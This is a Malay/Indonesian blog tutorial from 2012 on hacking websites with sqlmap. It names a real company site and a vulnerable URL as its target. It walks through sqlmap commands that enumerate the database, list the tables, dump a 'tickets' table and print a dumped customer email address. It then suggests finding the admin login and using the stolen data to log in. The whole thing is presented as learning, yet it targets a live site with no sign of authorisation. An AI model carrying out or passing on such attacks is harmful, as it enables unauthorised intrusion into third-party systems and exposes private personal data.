Wednesday, 18 January 2012

Pentest/Hack Website Dengan SqlMap


Assalamualaikum.....entry kali ni aq nak post hacking yang advance sikit.iaitu hack/deface website dengan SqlMap.Tuto ni aku amik dari group Macho Cyb3rSec.Credit to Macho Cyb3rSec, Rizky Mahabbah Pujangga, j0ck3r Xcode dan flazer.


Note : Tuto ini untuk pengguna Windows.Tapi untuk pengguna Linux Stepnya sama sahaja.


SqlMap ni lebih kurang SQLi tapi menggunakan tool SQLMap yang ditulis/buat dalam bahasa Python untuk melakukan serangan SQL injection secara automatik(sama fungsi macam HAVIJ.tapi melibatkan coding2.).


Ok dah faham??jom mula......



Pertama cari target dengan dork sql inject di google 

Penjelasan tentang Sqlmap

SQL: Map,semua praktisi hacking pasti mengenal tool ini,salah satu tool untuk melakukan dump sebuah database website yang bermasalah dengan SQL Injection,disini saya coba berbagi pengetahuan tentang menggunakan SQL Map ini,bukan saya bermaksud menggurui atau apa,karena saya pun hanyalah seorang yang tidak mempunyai skill lebih,masih dibawah

rata-rata,akan tetapi tidak ada salahnya pengetahuan saya yang sedikit ini saya share. Disini saya melakukan percobaan penetrasi langsung ke sebuah web,bukan localhosts,agar tidak dikira mengada-ada,web yang jadi "korban" test ini adalah sebuah web yang menawarkan jasa design website secara profesional,sungguh gak ada maksud meremehkan atau pamer,just info saja.Web yang saya maksud adalah

www.greatgulfhomes.com dimana web tersebut memilki vuln yang bisa kita explore menggunakan tehnik SQL Injection,ok langsung aja...

Pertama,pastikan komputer korang sekalian telah di-install Python versi berapa saja,lalu siapkan tool SQLMAP, Silahkan Cari Di Google,banyak berserakan Di Google :D

Download (Windows User) :
Phyton : http://www.python.org/download/
Sqlmap : http://sqlmap.sourceforge.net/ 



www.greatgulfhomes.com/neighbourhood-contact.php?id=38 dimana setelah saya tambahin ' di akhir URL,ditemukan pesan eror ala SQL,langsung aja deh kita buka sqlmap nya menggunakan CMD dengan perintah


C:\Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 --dbs



nih SS waktu awal Scan



Yuhu Nama DataBase Nya keliatan

yes ,databasenya dah ketemu yaitu "greatgulfhomes" sekarang kita ketikkan perintah

C:Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 -D greatgulfhomes --tables




perintah ini untuk mencari tabel dalam database yang udah kita temukan tadi....

,perintah ini kita gunakan untuk mengetahui nama databasenya...

Nih SS waktu mencari nama Data Base nya












wow..ternyata ada 312 tabel didalamnya,dan yang kita butuhkan ada disana,yaitu tabel tickets sebab ini real buat belajar :D ,maka sekarang saatnya kita ketikkan perintah

C:Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 -D greatgulfhomes -T tickets --columns


perintah ini untuk melihat colom apa saja yang ada di tabel tickets..

nih SS waktu Scan Table Tickets








wew udah keliatan tuh email , id , dan semua nya keliatan

saatnya kita liat isinya dengan perintah

C:Python27>python sqlmap.py -u www.greatgulfhomes.com/neighbourhood-contact.php?id=38 -D greatgulfhomes -T tickets --dump


perintah tersebut gunanya untuk men dump isi tabel tickets tadi...

nih SS waktu Dump Is tabel Tickets tadi,..






tara ss diatas adalah hasil dari dump kita

kita temukan isinya yaitu:

###################
email : d.lindsay@rogers.com
ID : 282321
###################

SQLMAP juga dilengkapi fasilitas untuk meng-crack password yang ditemukan,mengandalkan serangan dictionary attack,kita bisa memilih "y" untuk melakukan cracking atau "n" untuk tidak melakukan sesi cracking.Karena passwordnya tidak ter-enkripsi maka saya pilih opsi "n"

sampai disini tergantung kita,bila mau diteruskan maka kita tinggal mencari login adminnya, banyak cara kok,misal menggunakan adminfinder.py.havij,dll.lalu login dengan data yang udah kita dapatkan tadi.



Pentest menggunakan


1. python 2.7.2


2. Active python


3. sqlmap.py


4. Windows xp


5. kopi dan rokok

kalau ada salah atau salah tulis mohon di maafkan maklum newbie baru belajar :belajar

I' m just share buat belajar bersama ^_^

thanks to j0ck3r Xcode dan flazer, Macho Cyb3rS3c,
Rizky Mahabbah Pujangga

Sumber :
http://j0ck3r-maniax.blogspot.com/2011/12/tested-vuln-with-sql-map.html




Itu saja untuk tutorial ini.semoga berjaya!! Assalamualaikum!!
Item Reviewed: Pentest/Hack Website Dengan SqlMap Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com